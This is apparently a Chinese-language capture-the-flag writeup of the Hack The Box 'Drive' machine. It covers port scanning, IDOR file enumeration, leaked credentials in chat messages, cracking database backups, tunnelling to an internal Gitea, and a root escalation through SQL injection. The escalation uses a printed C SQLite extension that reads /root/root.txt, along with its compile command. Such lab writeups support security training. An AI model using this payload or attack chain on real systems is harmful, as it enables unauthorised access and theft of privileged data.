htb Drive wp

nmap -sS -sV --top-ports=1000 10.10.11.235

Nmap scan report for drive.htb (10.10.11.235)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -sU --top-ports=100 10.10.11.235 --min-rate=10000

PORT      STATE  SERVICE
123/udp   closed ntp
135/udp   closed msrpc
10000/udp closed ndmp
49200/udp closed unknown

echo "10.10.11.235 drive.htb" >>/etc/hosts

页面上所有contact都是兔子洞，试了没用

注册登录

木马上传无效，ssti不解析，xxe无用

点击时发现url可能存在遍历

遍历

存在高权文件

想办法获取

在组user add获取到其他userid

到处点找是否存在越权点
同样的文件在block下发现可以访问

bp轮询url信息收集
得到内容

u=crisDisel
hi team
have a great day.
we are testing the new edit functionality!
it seems to work great! 
G=doodleGrive-development-team 

u=jamesMason  
hi team
please we have to stop using the document platform for the chat
+I have fixed the security issues in the middleware
thanks! :)
g=security-team 

u=admin 
 hey team after the great success of the platform we need now to continue the work.
on the new features for ours platform.
I have created a user for martin on the server to make the workflow easier for you please use the password "XXXXXXXXXXXXXXXX".
please make the necessary changes to the code before the end of the month
I will reach you soon with the token to apply your changes on the repo
thanks!
g=doodleGrive-development-team 

u=jamesMason  
 hi team!
me and my friend(Cris) created a new scheduled backup plan for the database
the database will be automatically highly compressed and copied to /var/www/backups/ by a small bash script every day at 12:00 AM
*Note: the backup directory may change in the future!
*Note2: the backup would be protected with strong password! don't even think to crack it guys! :) 
gg=doodleGrive-development-team

内网

sudo -l没有命令

home下发现有git
并没发现高权文件

依据

u=jamesMason  
 hi team!
me and my friend(Cris) created a new scheduled backup plan for the database
the database will be automatically highly compressed and copied to /var/www/backups/ by a small bash script every day at 12:00 AM
*Note: the backup directory may change in the future!
*Note2: the backup would be protected with strong password! don't even think to crack it guys! :) 
gg=doodleGrive-development-team
security-team

找到/var/www/backups/
找到一个没有加密的库，包含账户密码

查询其余并未找到有用内容

hash查询不到特征

转变思路

home下有git，ps查询进程确认gitea

直接外部访问3000看不到内容 怀疑源地址做了限制

只允许本地连接

内网穿透进

用手头的user/passwd进去
拿到解压密码

解压往期数据库
发现hash可以识别

爆破sha1
发现只有tom的可以爆破
得到密码

登录发现密码不对

换另一个库备份，对比发现同一用户，不同库备份密码不同

挨个爆破得到一堆密码，轮着试

root

找了圈没有什么有用的了

拖下来分析这个文件

登录user/passwd

switch的5有SQL注入

这里我是用load_extension写个so执行
官方文档 https://sqlite.org/loadext.html

搓一下

#include <sqlite3ext.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

SQLITE_EXTENSION_INIT1

int sqlite3_extension_init(sqlite3 *db) {
  char *inputFile = "/root/root.txt";  
  char *outputFile = "/home/tom/haru";
  char buffer[1024];
  ssize_t bytesRead;
  int inFd = open(inputFile, O_RDONLY);
  int outFd = open(outputFile, O_WRONLY | O_CREAT | O_APPEND, S_IRUSR | S_IWUSR);
  while ((bytesRead = read(inFd, buffer, sizeof(buffer))) > 0) {
    write(outFd, buffer, bytesRead);
  }
  close(inFd);
  close(outFd);
  chmod(outputFile, S_IRWXU | S_IRWXG | S_IRWXO);
  return SQLITE_OK;
}

编译下

gcc -shared -fPIC -o C.so C.c

丢进去

然后在当前目录执行

当然也可以直接用这位师傅弹shell的方式

https://blog.csdn.net/qq_34101364/article/details/109250435
作者：5wimming